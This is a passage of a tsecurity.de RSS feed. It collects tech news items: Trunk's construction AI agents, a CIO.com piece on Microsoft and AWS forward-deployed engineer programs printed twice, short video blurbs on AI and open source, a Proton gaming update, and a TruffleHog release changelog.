truth data from customers and experts. They also employ an LLMs-as-a-judge model. </p><p>“This notion of an LLM as a judge is to score how well you're doing, both subjectively as well as objectively,” Kapoor said. Objectivity can be an easy ‘right’ or ‘not right,’ but subjectivity requires more nuance. </p><p>For instance, when creating an email or narrative or explanation, an LLM as a judge framework can create a composite score, or a numerical value that aggregates different metrics and tests a model's performance or risk.</p><p>There can be challenges, though, particularly with latency, Buchner noted; any time the reasoning capacity of underlying models increases, the risk of latency goes up, too. Trunk maintains a set of evaluation criteria to objectively measure latency whenever changes are made to underlying infrastructure, agents, and API calls. </p><p>Then, “before we release to customers, we ensure marginal changes to the end-user experience are well worth the performance enhancements,” Buchner said. </p><h2>From 60 days to 10: the measurable payoff</h2><p>Trunk’s platform powers seven AI agents purpose-built for construction, such as analyzing request for information (RFI) responses, overviewing bids, or reviewing drawings and submittals. </p><p>The submittal agent, for instance, flags missing, conflicting, or noncompliant information in product specs and RFIs. While it’s an essential step in the construction process, “it's a super annoying workflow,” Buchner said, because human reviewers have to compare documents “with a bunch of other parts of documents.” </p><p>But the agent is able to do this in seconds, and Trunk says it has reduced submittal cycles from 50 to 60 days to 10, “which has massive schedule and financial implications.” </p><p>Trunk is now at a place where these agents are communicating directly with each other, which is “quite exciting,” Buchner said. So, for example, one agent will review an architectural drawing for accuracy, then autonomously hand it over to agents handling RFIs and asking follow-up questions. </p><p>“If the drawings have problems, the RFI agent is taking over and is actively reaching out for clarification,” Buchner explained. </p><p>Trunk says its customers report savings of 20 to 40 minutes per field question. Buchner said that users in the field know better than anyone how much of a “time suck” it is to go back and forth from office trailers, dig through project documents in scattered systems or printed PDFs, reconcile discrepancies, and return to coordinate with trade partners. </p><p>Trunk says its customers report these additional outcomes:</p><ul><li><p>Average 8 minute time savings for single-document retrieval (status checks, location lookups, quantity queries).</p></li><li><p>Average 20 minute time savings for standard referencing (cross-referencing 2 to 3 spec sections to form an answer. </p></li><li><p>Average 40 minute time savings for multi-document research (listing and filtering queries, mapping relationships, analyzing RFIs and submittals across 4 to 6 documents).</p></li><li><p>Average 75 minute time savings for complex tasks (creating RFIs and other communication materials, deep cross-referencing across documents, change tracking). </p></li></ul><p>In one instance, Trunk’s drawing review agent flagged that a structural beam had been moved up 8.5 inches. However, this was not documented by the architect. If the change hadn’t been caught, the project manager would likely have had to strip out and reinstall the right size beam, Buchner said. This rework would have added $10,000 or more to the budget, and “certainly there would have been implications on the schedule.” </p><p>Buchner also pointed to other examples: an agent flagged $60,000 in exaggerated pricing with no justification from landscaping subcontractors; identified a fireplace that needed to be sealed prior to drywall installation, saving around $100,000 in labor, materials, and delays; and called out that an electric door required a panel that wasn’t included in electrical drawings. </p><h2>Learnings for other industries</h2><p>Trunk’s approach to building agents is applicable to any vertical working with high volumes of unstructured, industry-specific data. 

Builders working in specific verticals must understand the industry’s specific data challenges their end users face and build technical infrastructure that can transform unstructured data into something an “LLM can traverse and understand,” Buchner said. 

“Only then can you build the connections between data points that ultimately feed agentic workflows.”

A lot of money is being invested in foundational models, so enterprises should build modular systems that can leverage the strengths of various models as they continue to improve, Buchner advised. 

Then, “build your technical advantage where the generic models are not investing and not performing well,” she said. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[As AI capabilities accelerate, it's easy to focus on what the technology can create.]]></title>
<description><![CDATA[Author: PQShield - Bewertung: 2x - Views:50 As AI capabilities accelerate, it's easy to focus on what the technology can create.

But as Eric Amador points out on Shielded: The Last Line of Cyber Defense:
AI is a fantastic tool to put things together, but it's not really good at creating new bric...]]></description>
<link>https://tsecurity.de/de/3643650/videos/as-ai-capabilities-accelerate-its-easy-to-focus-on-what-the-technology-can-create/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643650/videos/as-ai-capabilities-accelerate-its-easy-to-focus-on-what-the-technology-can-create/</guid>
<pubDate>Fri, 03 Jul 2026 15:18:28 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: PQShield - Bewertung: 2x - Views:50 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ukZC1Sn1Uss?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>As AI capabilities accelerate, it's easy to focus on what the technology can create.<br />
<br />
But as Eric Amador points out on Shielded: The Last Line of Cyber Defense:<br />
AI is a fantastic tool to put things together, but it's not really good at creating new bricks.<br />
<br />
Behind every AI-powered innovation are the developers, researchers, standards bodies, and open-source communities creating the foundational building blocks that make progress possible.<br />
<br />
The future of cybersecurity won't be built by AI alone. It will depend on continued investment in open standards, transparent research, quality documentation, and collaborative innovation.<br />
AI might assemble the future.<br />
Open source helps create it.<br />
<br />
What's one open-source project that has had a major impact on your work?<br />
<br />
#OpenSource #AI #CyberSecurity #Technology #Innovation #DeveloperCommunity #CyberDefense #ShieldedPodcast<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Fable 5, KI-Agenten & Open Source: Die wichtigsten KI-News Q2 2026 | INSIDE AI #37]]></title>
<description><![CDATA[Author: Fraunhofer IEM - Bewertung: 3x - Views:23 In der 37. Episode von Inside AI ordnet KI-Experte Tommy Falkowski die wichtigsten Entwicklungen aus der Welt der Künstlichen Intelligenz im zweiten Quartal 2026 ein.

Im Mittelpunkt stehen das neue Claude-Fable-5-Modell von Anthropic, Diskussione...]]></description>
<link>https://tsecurity.de/de/3643002/videos/claude-fable-5-ki-agenten-open-source-die-wichtigsten-ki-news-q2-2026-inside-ai-37/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643002/videos/claude-fable-5-ki-agenten-open-source-die-wichtigsten-ki-news-q2-2026-inside-ai-37/</guid>
<pubDate>Fri, 03 Jul 2026 10:18:09 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Fraunhofer IEM - Bewertung: 3x - Views:23 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/WqrwhtfSsuo?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In der 37. Episode von Inside AI ordnet KI-Experte Tommy Falkowski die wichtigsten Entwicklungen aus der Welt der Künstlichen Intelligenz im zweiten Quartal 2026 ein.<br />
<br />
Im Mittelpunkt stehen das neue Claude-Fable-5-Modell von Anthropic, Diskussionen rund um Sicherheitsrisiken und Exportbeschränkungen sowie die Frage, welche Auswirkungen leistungsfähigere KI-Modelle auf Unternehmen und Europa haben. Darüber hinaus geht es um den aktuellen Trend zu Agentic Loops und autonomen KI-Agenten, wirtschaftliche Herausforderungen durch steigende Token-Kosten, die Profitabilität großer KI-Unternehmen sowie neue Open-Source-Modelle als mögliche Alternative zu kommerziellen Angeboten.<br />
<br />
Tommy Falkowski<br />
🔗 LinkedIn: https://www.linkedin.com/in/tommy-falkowski/<br />
<br />
Überblick<br />
<br />
0:00 – Einführung: KI-Druckbetankung Q2 2026<br />
0:30 – Claude Fable 5: Leistungsfähigkeit, Sicherheit und Exportbeschränkungen<br />
5:17 – Agentic Loops: Der neue Trend autonomer KI-Agenten<br />
8:38 – Praxisbeispiele für Loop Engineering und Coding-Agenten<br />
10:03 – Token-Kosten und wirtschaftliche Herausforderungen für Unternehmen<br />
14:35 – Sind OpenAI und Anthropic langfristig profitabel?<br />
17:31 – Neue Open-Source-Modelle: GLM 5.2 und Kimi K2-7<br />
19:31 – Warum Europa eigene KI-Modelle benötigt<br />
21:17 – Fazit und Diskussion: Wie sinnvoll sind autonome KI-Agenten?<br />
<br />
📺 Abonniere unseren YouTube-Kanal:<br />
https://www.youtube.com/@fraunhoferiem<br />
<br />
Mehr erfahren & vernetzen:<br />
🔗 LinkedIn: https://www.linkedin.com/company/fraunhofer-iem<br />
📸 Instagram: https://www.instagram.com/fraunhofer.iem<br />
📩 Newsletter: https://www.iem.fraunhofer.de/newsletter<br />
<br />
#KI #Claude #Anthropic #OpenAI #GenerativeAI #AIAgents #OpenSource #FraunhoferIEM<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proton Experimental gets fixes for DEATHLOOP, DRAGON QUEST BUILDERS and more]]></title>
<description><![CDATA[Linux / SteamOS gaming continues to level up with a Proton Experimental update to get more Windows games working well on Steam Deck, Steam Machine and others.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3642891/linux-tipps/proton-experimental-gets-fixes-for-deathloop-dragon-quest-builders-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642891/linux-tipps/proton-experimental-gets-fixes-for-deathloop-dragon-quest-builders-and-more/</guid>
<pubDate>Fri, 03 Jul 2026 09:08:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Linux / SteamOS gaming continues to level up with a Proton Experimental update to get more Windows games working well on Steam Deck, Steam Machine and others.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1522086982id29321gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/07/proton-experimental-gets-fixes-for-deathloop-dragon-quest-builders-and-more/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft and Amazon devote billions of dollars to thousands of FDEs]]></title>
<description><![CDATA[Systems integrators (SIs) have been integral to IT projects for decades, providing consulting services and helping enterprises build and launch technology tools.



Now, as organizations move to deploy agentic AI, top large language model (LLM) providers are looking to get in on that action. A pr...]]></description>
<link>https://tsecurity.de/de/3642543/it-nachrichten/microsoft-and-amazon-devote-billions-of-dollars-to-thousands-of-fdes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642543/it-nachrichten/microsoft-and-amazon-devote-billions-of-dollars-to-thousands-of-fdes/</guid>
<pubDate>Fri, 03 Jul 2026 03:17:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Systems integrators (SIs) have been integral to IT projects for decades, providing consulting services and helping enterprises build and launch technology tools.</p>



<p>Now, as organizations move to deploy agentic AI, top large language model (LLM) providers are looking to get in on that action. A proliferation of Forward Deployed Engineer (FDE) services embeds AI experts directly into customer teams to help create, customize, and launch AI services.</p>



<p>For instance, this week, Microsoft launched a $2.5 billion venture, Microsoft Frontier Company, that the tech giant says “goes beyond” FDE, and Amazon Web Services (AWS) announced its own $1 billion investment into a new AWS FDE platform.</p>



<p>Both projects will integrate thousands of Microsoft and AWS engineers into customer environments to help them not only build AI tools, but learn essential skills to handle projects on their own going forward. Other big model players, including <a href="https://www.cio.com/article/4167981/anthropics-financial-agents-expose-forward-deployed-engineers-as-new-ai-limiting-factor.html" target="_blank">Anthropic</a>, are also getting into the game with their own <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html" target="_blank">FDE services</a>.</p>



<p>The gap between AI investment and ROI is growing, noted <a href="https://www.infotech.com/profiles/thomas-randall" target="_blank" rel="noreferrer noopener">Thomas Randall</a>, research director at Info-Tech Research Group, and organizations are under pressure to show production value from AI deployments.</p>



<p>This is the context in which vendor FDEs such as those from Microsoft and AWS will become relevant to “compress learning curves from their deep product knowledge, establish reusable processes, and build capabilities that can then be transferred,” he said.</p>



<h2 class="wp-block-heading">Frontier transformation</h2>



<p>Microsoft Frontier Company will place 6,000 experts with customers to “co-design, co-innovate, deploy and continuously improve” AI systems based on their specific business goals, <a href="https://news.microsoft.com/source/exec/judson-althoff/" target="_blank" rel="noreferrer noopener">Judson Althoff</a>, CEO of Microsoft Commercial Business, <a href="https://www.microsoft.com/en-us/frontier-company" target="_blank" rel="noreferrer noopener">wrote in a blog post</a>.</p>



<p>The new offering focuses on what Microsoft calls “Frontier Transformation,” helping customers build an intelligence platform based on their proprietary data and internal expertise, workflows, and decision-making processes. Based on FinOps principles, the offering helps users “observe, govern, manage, and secure” AI tools across their stacks, and their intelligence compounds over time, Althoff said.</p>



<p>Microsoft Frontier Company is a “model-diverse, open, heterogeneous” platform, Althoff noted; customers can choose their own models: ChatGPT, Claude, Microsoft Copilot, or other open source or industry-specific models.</p>



<p>“Customers shouldn’t be locked into a single model any more than they should be locked into a single technology vendor,” Althoff noted. Further, he emphasized, customer data and IP are protected, and are not used to train Microsoft’s models.</p>



<p>The tech giant says it will leverage its SI and FDE partnerships with Accenture, Capgemini, EY, KPMG, PwC, and others to help scale the platform. Early users including London Stock Exchange Group (LSEG), Land O’Lakes, Unilever, and Novo Nordisk are already seeing “measurable outcomes,” Althoff said.</p>



<p>For instance, AI embedded into LSEG Workspace helps finance experts ask complex questions and get quick answers based on structured and unstructured financial data. The underlying foundation is “iteratively refined” through client feedback and real-time user testing, Althoff explained. This accelerates each cycle and improves model quality and scope.</p>



<p>This is the value of FDEs, he contended: “Enterprise AI engineering expertise with deep industry knowledge is required to build a system that acts as a continuous loop of improvement,”</p>



<h2 class="wp-block-heading">Compressing timelines</h2>



<p>Like Microsoft Frontier Company, AWS FDE embeds its experienced engineers into customers’ business, engineering, and security teams to help them build and launch agents purpose-built on their specific data, processes, and governance frameworks, AWS’ VP of frontier AI engineering and services <a href="https://www.linkedin.com/in/francesscavasquez" target="_blank" rel="noreferrer noopener">Francessca Vasquez</a> explained in a <a href="http://aboutamazon.com/news/aws/aws-1-billion-forward-deployed-ai-engineers" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p>“Unlike traditional consulting that assesses, recommends, and treats each deployment as a standalone project, <a href="https://www.computerworld.com/article/4184226/qa-a-look-at-forward-deployed-engineers-aws-style.html" target="_blank">AWS FDE</a> builds for the long term,” she noted. Customers become “self-sufficient with AI,” moving from “observers to co-builders to autonomous operators” as they learn AI skills, workflows, and patterns that they can use to build AI going forward.</p>



<p>The platform is agentic-first and designed to compress timelines “from months to days,” and the derived business intelligence compounds to support future projects, Vasquez said.</p>



<p><a href="https://www.cio.com/article/4118737/the-forward-deployed-engineer-why-talent-not-technology-is-the-true-bottleneck-for-enterprise-ai.html" target="_blank">Embedded engineers</a>, many of whom build AWS AI services, verify and guide projects; AWS says it is also investing in training, tools, and resources for partners, to bolster the platform.</p>



<p>Customers gain access to runbooks, and architectural documentation, and a semantic layer connects to their data sources to create a knowledge graph that AI agents can reason over, Vasquez said.</p>



<p>She emphasized that domain expertise resides in the customer’s code, agents, and systems, so institutional knowledge does not get lost with employee turnover. Further, security tools provide hardware-based isolation and end-to-end encryption.</p>



<p>AWS FDE is not intended for those merely experimenting with AI, Vasquez noted, it is “built for organizations that have moved past experimentation and need production AI systems running real business processes.”</p>



<h2 class="wp-block-heading">Still a market for SIs</h2>



<p>SIs have enjoyed decades of high-margin relationships with their customers, so it makes “eminent sense” for hyperscalers to try to grab some of that business for themselves, noted technology analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p>“Both Microsoft and Amazon are aggressively looking for ways to tighten customer lock-in and open up more opportunities to get inside both their clients’ operations and decision making apparatus,” he pointed out.</p>



<p>In addition, Randall said, Info-Tech’s research reveals that 77% of organizations do not have a corporate-wide AI strategy. FDEs will address this by being narrow and specific to the customer’s working AI systems, reference architecture, runbooks, and other deliverables.</p>



<p>SIs, however, provide a different service, he said. Their relevance will be in broader integration knowledge across systems, managing change, and scaling programs. “Their deliverables will be more strategic and broader in scope.”</p>



<p>Of course, there is overlap, he said, and Microsoft will work closely with global SI partners. The investment gap and implementation complexity put hyperscalers under pressure to “provide more white-glove services to pull their customers along.”</p>



<h2 class="wp-block-heading">Considerations for enterprises</h2>



<p>Levy noted that, for customers who have already decided on a particular AI stack, these platforms may be worthwhile as long as they’re comfortable taking a single-vendor route.</p>



<p>“Assuming Microsoft and Amazon are price- and service-competitive with systems integrators, they may represent a compelling alternative,” he said. Still, using their services could come at a cost of potentially reduced choice, which could limit longer-term options.</p>



<p>It remains to be seen whether these types of platform are better for the customer or the vendor, and deliver more value than existing alternatives, he said, but the market will ultimately decide.</p>



<p>With that in mind, he advised IT decision makers to deep-dive not only into Microsoft’s and Amazon’s agentic delivery competencies compared to those of SIs, but into whether their underlying motivations are “truly in the customers’ best interests.”</p>



<p>Info-Tech’s Randall also advised enterprises to consider the output they’re looking for. FDEs will fast-track accurate builds on specific platforms they specialize in, while SIs will then help make the platform work across an enterprise context.</p>



<p>FDE options are best for organizations looking past AI pilots to quick, effective product buildouts, he said. SIs are needed when those organizations need to scale that pattern across messy enterprise processes.</p>



<p>Another factor to consider: “FDEs are not suitable for organizations still working on basic AI strategy questions or that want to remain cloud neutral,” said Randall.</p>



<p><em>This article originally appeared on<a href="https://www.cio.com/article/4192504/microsoft-and-amazon-devote-billions-of-dollars-to-thousands-of-fdes.html" target="_blank"> CIO.com</a>.</em></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft and Amazon devote billions of dollars to thousands of FDEs]]></title>
<description><![CDATA[Systems integrators (SIs) have been integral to IT projects for decades, providing consulting services and helping enterprises build and launch technology tools.



Now, as organizations move to deploy agentic AI, top large language model (LLM) providers are looking to get in on that action. A pr...]]></description>
<link>https://tsecurity.de/de/3642530/it-security-nachrichten/microsoft-and-amazon-devote-billions-of-dollars-to-thousands-of-fdes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642530/it-security-nachrichten/microsoft-and-amazon-devote-billions-of-dollars-to-thousands-of-fdes/</guid>
<pubDate>Fri, 03 Jul 2026 03:08:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Systems integrators (SIs) have been integral to IT projects for decades, providing consulting services and helping enterprises build and launch technology tools.</p>



<p>Now, as organizations move to deploy agentic AI, top large language model (LLM) providers are looking to get in on that action. A proliferation of Forward Deployed Engineer (FDE) services embeds AI experts directly into customer teams to help create, customize, and launch AI services.</p>



<p>For instance, this week, Microsoft launched a $2.5 billion venture, Microsoft Frontier Company, that the tech giant says “goes beyond” FDE, and Amazon Web Services (AWS) announced its own $1 billion investment into a new AWS FDE platform.</p>



<p>Both projects will integrate thousands of Microsoft and AWS engineers into customer environments to help them not only build AI tools, but learn essential skills to handle projects on their own going forward. Other big model players, including <a href="https://www.cio.com/article/4167981/anthropics-financial-agents-expose-forward-deployed-engineers-as-new-ai-limiting-factor.html" target="_blank">Anthropic</a>, are also getting into the game with their own <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html" target="_blank">FDE services</a>.</p>



<p>The gap between AI investment and ROI is growing, noted <a href="https://www.infotech.com/profiles/thomas-randall" target="_blank" rel="nofollow">Thomas Randall</a>, research director at Info-Tech Research Group, and organizations are under pressure to show production value from AI deployments.</p>



<p>This is the context in which vendor FDEs such as those from Microsoft and AWS will become relevant to “compress learning curves from their deep product knowledge, establish reusable processes, and build capabilities that can then be transferred,” he said.</p>



<h2 class="wp-block-heading">Frontier transformation</h2>



<p>Microsoft Frontier Company will place 6,000 experts with customers to “co-design, co-innovate, deploy and continuously improve” AI systems based on their specific business goals, <a href="https://news.microsoft.com/source/exec/judson-althoff/" target="_blank" rel="nofollow">Judson Althoff</a>, CEO of Microsoft Commercial Business, <a href="https://www.microsoft.com/en-us/frontier-company" target="_blank" rel="nofollow">wrote in a blog post</a>.</p>



<p>The new offering focuses on what Microsoft calls “Frontier Transformation,” helping customers build an intelligence platform based on their proprietary data and internal expertise, workflows, and decision-making processes. Based on FinOps principles, the offering helps users “observe, govern, manage, and secure” AI tools across their stacks, and their intelligence compounds over time, Althoff said.</p>



<p>Microsoft Frontier Company is a “model-diverse, open, heterogeneous” platform, Althoff noted; customers can choose their own models: ChatGPT, Claude, Microsoft Copilot, or other open source or industry-specific models.</p>



<p>“Customers shouldn’t be locked into a single model any more than they should be locked into a single technology vendor,” Althoff noted. Further, he emphasized, customer data and IP are protected, and are not used to train Microsoft’s models.</p>



<p>The tech giant says it will leverage its SI and FDE partnerships with Accenture, Capgemini, EY, KPMG, PwC, and others to help scale the platform. Early users including London Stock Exchange Group (LSEG), Land O’Lakes, Unilever, and Novo Nordisk are already seeing “measurable outcomes,” Althoff said.</p>



<p>For instance, AI embedded into LSEG Workspace helps finance experts ask complex questions and get quick answers based on structured and unstructured financial data. The underlying foundation is “iteratively refined” through client feedback and real-time user testing, Althoff explained. This accelerates each cycle and improves model quality and scope.</p>



<p>This is the value of FDEs, he contended: “Enterprise AI engineering expertise with deep industry knowledge is required to build a system that acts as a continuous loop of improvement,”</p>



<h2 class="wp-block-heading">Compressing timelines</h2>



<p>Like Microsoft Frontier Company, AWS FDE embeds its experienced engineers into customers’ business, engineering, and security teams to help them build and launch agents purpose-built on their specific data, processes, and governance frameworks, AWS’ VP of frontier AI engineering and services <a href="https://www.linkedin.com/in/francesscavasquez" target="_blank" rel="nofollow">Francessca Vasquez</a> explained in a <a href="http://aboutamazon.com/news/aws/aws-1-billion-forward-deployed-ai-engineers" target="_blank" rel="nofollow">blog post</a>.</p>



<p>“Unlike traditional consulting that assesses, recommends, and treats each deployment as a standalone project, <a href="https://www.computerworld.com/article/4184226/qa-a-look-at-forward-deployed-engineers-aws-style.html" target="_blank">AWS FDE</a> builds for the long term,” she noted. Customers become “self-sufficient with AI,” moving from “observers to co-builders to autonomous operators” as they learn AI skills, workflows, and patterns that they can use to build AI going forward.</p>



<p>The platform is agentic-first and designed to compress timelines “from months to days,” and the derived business intelligence compounds to support future projects, Vasquez said.</p>



<p><a href="https://www.cio.com/article/4118737/the-forward-deployed-engineer-why-talent-not-technology-is-the-true-bottleneck-for-enterprise-ai.html" target="_blank">Embedded engineers</a>, many of whom build AWS AI services, verify and guide projects; AWS says it is also investing in training, tools, and resources for partners, to bolster the platform.</p>



<p>Customers gain access to runbooks, and architectural documentation, and a semantic layer connects to their data sources to create a knowledge graph that AI agents can reason over, Vasquez said.</p>



<p>She emphasized that domain expertise resides in the customer’s code, agents, and systems, so institutional knowledge does not get lost with employee turnover. Further, security tools provide hardware-based isolation and end-to-end encryption.</p>



<p>AWS FDE is not intended for those merely experimenting with AI, Vasquez noted, it is “built for organizations that have moved past experimentation and need production AI systems running real business processes.”</p>



<h2 class="wp-block-heading">Still a market for SIs</h2>



<p>SIs have enjoyed decades of high-margin relationships with their customers, so it makes “eminent sense” for hyperscalers to try to grab some of that business for themselves, noted technology analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="nofollow">Carmi Levy</a>.</p>



<p>“Both Microsoft and Amazon are aggressively looking for ways to tighten customer lock-in and open up more opportunities to get inside both their clients’ operations and decision making apparatus,” he pointed out.</p>



<p>In addition, Randall said, Info-Tech’s research reveals that 77% of organizations do not have a corporate-wide AI strategy. FDEs will address this by being narrow and specific to the customer’s working AI systems, reference architecture, runbooks, and other deliverables.</p>



<p>SIs, however, provide a different service, he said. Their relevance will be in broader integration knowledge across systems, managing change, and scaling programs. “Their deliverables will be more strategic and broader in scope.”</p>



<p>Of course, there is overlap, he said, and Microsoft will work closely with global SI partners. The investment gap and implementation complexity put hyperscalers under pressure to “provide more white-glove services to pull their customers along.”</p>



<h2 class="wp-block-heading">Considerations for enterprises</h2>



<p>Levy noted that, for customers who have already decided on a particular AI stack, these platforms may be worthwhile as long as they’re comfortable taking a single-vendor route.</p>



<p>“Assuming Microsoft and Amazon are price- and service-competitive with systems integrators, they may represent a compelling alternative,” he said. Still, using their services could come at a cost of potentially reduced choice, which could limit longer-term options.</p>



<p>It remains to be seen whether these types of platform are better for the customer or the vendor, and deliver more value than existing alternatives, he said, but the market will ultimately decide.</p>



<p>With that in mind, he advised IT decision makers to deep-dive not only into Microsoft’s and Amazon’s agentic delivery competencies compared to those of SIs, but into whether their underlying motivations are “truly in the customers’ best interests.”</p>



<p>Info-Tech’s Randall also advised enterprises to consider the output they’re looking for. FDEs will fast-track accurate builds on specific platforms they specialize in, while SIs will then help make the platform work across an enterprise context.</p>



<p>FDE options are best for organizations looking past AI pilots to quick, effective product buildouts, he said. SIs are needed when those organizations need to scale that pattern across messy enterprise processes.</p>



<p>Another factor to consider: “FDEs are not suitable for organizations still working on basic AI strategy questions or that want to remain cloud neutral,” said Randall.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.95.8]]></title>
<description><![CDATA[What's Changed

removed "unauthorized" as exception for rotated graphana secrets by @jordanTunstill in #5068
fix(azuresastoken): match SAS tokens regardless of parameter order by @genisis0x in #5043
Add prometheus metrics for engine channels and workers by @mcastorina in #5095
[INS-465] Skip unve...]]></description>
<link>https://tsecurity.de/de/3642077/it-security-tools/v3958/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642077/it-security-tools/v3958/</guid>
<pubDate>Thu, 02 Jul 2026 21:03:51 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>removed "unauthorized" as exception for rotated graphana secrets by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jordanTunstill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jordanTunstill">@jordanTunstill</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727900018" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5068" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5068/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5068">#5068</a></li>
<li>fix(azuresastoken): match SAS tokens regardless of parameter order by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/genisis0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/genisis0x">@genisis0x</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4672252289" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5043" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5043/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5043">#5043</a></li>
<li>Add prometheus metrics for engine channels and workers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcastorina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcastorina">@mcastorina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4781406292" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5095" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5095/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5095">#5095</a></li>
<li>[INS-465] Skip unverified JWT Detector results when feature flag is enabled by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734650006" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5072" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5072/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5072">#5072</a></li>
<li>[INS-334] Octopus Deploy detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4021133577" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4787" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4787/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4787">#4787</a></li>
<li>Fix Syntax error in feature.go by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794341474" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5109" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5109/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5109">#5109</a></li>
<li>Include encoded resume info instead of clobbering it by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bill-rich/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bill-rich">@bill-rich</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4796819329" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5110" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5110/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5110">#5110</a></li>
</ul>
